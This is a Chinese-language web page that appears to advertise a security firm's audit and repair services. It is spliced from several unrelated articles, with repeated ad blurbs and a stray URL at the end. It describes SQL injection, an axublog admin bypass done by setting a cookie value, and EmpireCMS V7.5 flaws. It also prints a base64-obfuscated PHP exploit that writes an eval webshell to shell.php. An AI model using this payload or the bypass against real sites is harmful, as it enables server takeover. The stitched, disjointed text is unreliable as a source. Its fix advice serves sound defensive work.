服务方式人工
**解决不掉
app渗透测试支持
网站安全防护支持
cc防护支持
网站漏洞修复,网站程序代码的安全审计,包括PHP、ASP、JSP、.NET等程序代码的安全审计,上传漏洞,SQL注入漏洞,身份验证漏洞,XSS跨站漏洞,命令执行漏洞,文件包含漏洞,权限提升漏洞等的安全审计,网站防篡改方案,后台登录二次安全验证部署,百度风险提示的解除,等恶意内容百度快照清理,以及网站后门木马和程序恶意挂马代码的检测和清除,网站源代码及数据库的加密和防止泄露。
我们来看下这个网站的代码编写,我们来利用下该如何sql注入攻击:web前端网站通过get_id这个值获取了访问用户输入的参数值,并传递给ID这个值上去,ID这个值没有对输入的参数进行安全过滤,导致该值里的恶意参数传递到服务器后端去,紧接着又送到了数据库,进行了数据库的sql语句执行。一般都是参数拼接而成的sql语句,当用户提交一些逗号之类的and1=1等等的字符时就会执行sql语句。

比如在axublog程序中,网站后台存在一个验证管理员登录的一个函数chkadcookie()。但是在网站后台的ad中并没有chkadcookie()此验证函数,因而就造成了普通访问条用户可以越权访问。这种漏洞的原理也比较简单,一般情况下是经验不足的开发者漏掉了验证函数。Sine安全公司是一家专注于:服务器安全、网站安全、网站安全检测、网站漏洞修复,渗透测试,安全服
务于一体的网络安全服务提供商。后台验证代码没有做到的安全验证axublog后台验证函数绕过后台登录的验证方式在axublog中的后台验证函数是chkadcookie(),代码如下图所示:通过对网站代码的详细安全检测,发现了问题中只有date我们是无法知道,而UA和REMOTE_ADDR都是客户端可控的验证逻辑是如果在COOKIE中出现了在txtchkad.txt中的值,
那么就认为是登录的。这样的验证逻辑明显存在很大的漏洞问题。如何绕过后台验证?只需要将COOKIE中的chkad设置为_就可以绕过后台的登录了。网站安全之变量覆盖漏洞详情:beescms的后台验证函数绕过后台验证方式检查登录的函数is_login()的代码为如下图所示:上述的代码中并没有对使用fl_value()函数进行过滤,但又使用了extract()这样的函数,

近我们SINE安全在对帝国CMS系统进行代码安全审计的时候,发现该系统存在漏洞,受影响的版本是EmpireCMS V7.5,从帝国下载到本地,我们人工对其代码进行详细的漏洞检测与安全代码分析。共计发现三个高危漏洞,都是在的后台管理页面上的功能发现的。该漏洞的产生,根源的问题是没有对get,post提交方式进行严格的安全效验与过滤,导致可以插入恶意代码到后端服务器中去处理,导致漏洞的发生。帝国CMS系统,简单给大家介绍一下,目前很多站长,以及企业建站,都在使用该套系统,快速,便捷,易于搜索引擎收录,采用的是B/S架构开发,php语言+Mysql数据库,支持大并发同时访问,可以承载较多的用户快速的访问的各个页面与内容,模板自定义化,可以设置标签与自行设计外观,静态html生成,还有采集功能,深受广大站长和运营者的喜欢。我们SINE安全技术在对该代码进行安全检测与渗透测试的手,会先大体看下代码,熟悉整个的架构,数据库配置文件,以及入口调用到的文件,通常调用到的安全规则是如何写的,多个方面去大体的了解该代码,目前渗透测试中,发现的漏洞有:SQL注入漏洞,敏感信息泄露,初始化安装功能漏洞,直行平行越权逻辑漏洞,任意文件上传漏洞,登录绕过漏洞,短信验证码漏洞,找回密码漏洞,数据库备份webshell,XSS跨站,CSRF漏洞等待。
首先我们检测到的是帝国安装代码功能上存在可以插入恶意代码漏洞,在install安装目录下的index.php文件中,可以查到表的前缀,也就是获取前端提交过来的参数,然后继续往下看,data目录下的fun.php代码里的参数并没有做任何的安全效验,导致可以直接插入恶意代码写入到配置文件config.php中去。漏洞详情如下图:
后台还存在get webshell漏洞,打开后台管理功能页面,选择管理首页模板,紧接着右键点击增加首页方案中,复制漏洞exp代码:<?php $aa = base64_decode(ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA)${(system)($aa)};?> 解密base64后是:ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbaHBdKTsnPnNoZWxsLnBocA=>echo '<?php eval($_REQUEST[hp]);'>shell.php写到模板内容页面里,左键点击提交,再点击启用此方案,就在会e/admin/template/文件夹下生成一个shell.php文件。
关于帝国CMS漏洞的修复办法,对所有的get,post请求做安全过滤,也可以直接在eaddslashes2的参数里增加恶意代码的拦截机制,先检测后放行,该漏洞的利用条件是需要有后台管理员权限,利用的不是太多,建议对后台的管理目录进行更改,或者直接将管理员的密码设置的复杂一些。如果您对漏洞修复不是太懂的话,也可以找专业的安全公司来处理,国内SINE安全,启明星辰,绿盟,都是比较不错的,漏洞经常出现,也请的运营者多多关注EmpireCMS的,一有补丁就立即修复掉,将安全损失降到低。

然而,大多数的网站安全审计系统,开发较为简单、适应性强,好看不中用,可以简单的处理一些网站安全日志文档,很难对不同日志文档中相关信息的进行详细的处理。Sine安全公司是一家专注于:服务器安全、网站安全、网站安全检测、网站漏洞修复,渗透测试,安全服务于一体的网络安全服务提供商。另外,目前市面上的网站安全日志审计系统,采用的都是文档系统钩子技术,当审计的日志文件在增加到一定数量上,会导致在处理日志的多线程能力以及性能上大幅降低,有的时候导致服务器缓慢并影响网站的正常访问。这种日志系统不能审计特别多的日志文档。网站安全日志检测系统主要应用于服务器在部署网站,部署网站所需环境,安装数据库之前的一个初始环境中。全方位的对网站的每个地方,访问日志,操作日志,后台日志,上传日志,以及文档访问的并记录到统一的LOG日志中。网站安全日志系统主要包含以下模块:1、对网站的各种访问日志、Web服务器日志、数据库安全日志以及FTP连接日志,进行统一的合并到一个日志文档中。2、在网站安全日志系统中对写入到的各种日志,进行实时高速处理与分析,然后根据系统内置好的安全规则库生成相应的安全警告提示,并通过微信和手机短信发送安全警告信息。
所以对代码的安全审计,都需要费时费力,我们就要用心的去做安全,每一个代码,每一个文件都要认真审查,漏过一个细节,对安全来说就是致命的。
http://www.qdshtddzkj.com